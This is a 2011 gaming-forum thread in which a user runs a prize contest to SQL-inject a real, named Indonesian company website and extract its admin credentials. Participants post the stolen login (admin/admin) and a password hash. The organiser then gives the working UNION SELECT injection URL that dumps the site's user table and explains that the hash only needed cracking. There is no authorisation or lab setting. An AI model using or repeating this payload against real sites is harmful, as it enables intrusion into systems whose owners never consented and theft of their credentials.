Post: SQL injection contest - 50k vBux reward - FREE ENTRY
12-18-2011, 12:42 AM #1
tokzikate
Gym leader
(adsbygoogle = window.adsbygoogle || []).push({}); Test out your SQL injecting skills Winky Winky

Sql Injection Competition

Okay so this is a contest, to see who can get the admin username and password first.

The winner will recieve a 50k vBux reward!

It is free to enter!

Once you receive the admin username and password, post here, the first person to post the correct details will win the prize! Happy

The site is: https://nopalindonesia.com/

some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues



{}{}{} GO {}{}{}

un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read
You must login or register to view this content.tut on SQL injection.


Last edited by tokzikate ; 12-18-2011 at 01:01 AM.
12-18-2011, 06:24 AM #2
Default Avatar
Cade
Guest
Originally posted by tokzikate View Post
Test out your SQL injecting skills Winky Winky

Sql Injection Competition

Okay so this is a contest, to see who can get the admin username and password first.

The winner will recieve a 50k vBux reward!

It is free to enter!

Once you receive the admin username and password, post here, the first person to post the correct details will win the prize! Happy

The site is: https://nopalindonesia.com/

some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues



{}{}{} GO {}{}{}

un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read
You must login or register to view this content.tut on SQL injection.




user:admin
pass:admin


:dumb::dumb:
12-18-2011, 06:29 AM #3
Snow Samurai
Climbing up the ladder
Originally posted by Team
user:admin
pass:admin


:dumb::dumb:

yo lol wtf did i do wrong i got $1$dg/.iu1.$sBvhmZWxa.LDyDp7wmC9t/
12-18-2011, 06:33 AM #4
Koltz
Banned
Originally posted by tokzikate View Post
Test out your SQL injecting skills Winky Winky

Sql Injection Competition

Okay so this is a contest, to see who can get the admin username and password first.

The winner will recieve a 50k vBux reward!

It is free to enter!

Once you receive the admin username and password, post here, the first person to post the correct details will win the prize! Happy

The site is: https://nopalindonesia.com/

some extra notes:
I know the username & password, and they will stay the same because the site has some serious database issues



{}{}{} GO {}{}{}

un-FAQ
Q) why I'm doing this for free?
A) I'm bored and vBux don't really matter to me, so enjoy! I also want to see how many people here have read
You must login or register to view this content.tut on SQL injection.




lol it admin
admin :carling:

EDIT: DAMN! BEATIN TO THE ANWSER
12-18-2011, 06:47 AM #5
tokzikate
Gym leader
good work Winky Winky haha
enjoy your 50k Happy
Originally posted by Team
user:admin
pass:admin


:dumb::dumb:
12-18-2011, 06:49 AM #6
Koltz
Banned
Originally posted by tokzikate View Post
good work Winky Winky haha
enjoy your 50k Happy


can i have some too. Gaspkay:
12-18-2011, 06:49 AM #7
tokzikate
Gym leader
i dont know but here is the final URL injection:
    https://www.nopalindonesia.com/view.php?idArtikel=-12+UNION+SELECT+1,2,group_concat(username, 0x3a,password),4,5,6,7 from user

then all you had to do was decrypt the weak MD5 hash to get the password "admin"
Originally posted by Snow
yo lol wtf did i do wrong i got $1$dg/.iu1.$sBvhmZWxa.LDyDp7wmC9t/
12-18-2011, 06:52 AM #8
Snow Samurai
Climbing up the ladder
Originally posted by tokzikate View Post
i dont know but here is the final URL injection:
    https://www.nopalindonesia.com/view.php?idArtikel=-12+UNION+SELECT+1,2,group_concat(username, 0x3a,password),4,5,6,7 from user

then all you had to do was decrypt the weak MD5 hash to get the password "admin"

/facepalm i got that too /facepalm /facepalm im an idiot
12-18-2011, 06:54 AM #9
tokzikate
Gym leader
I'll make another contest soon, Happy
Originally posted by FRESHIX
can i have some too. Gaspkay:
12-18-2011, 06:55 AM #10
Koltz
Banned
Originally posted by tokzikate View Post
I'll make another contest soon, Happy


aww man. );

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo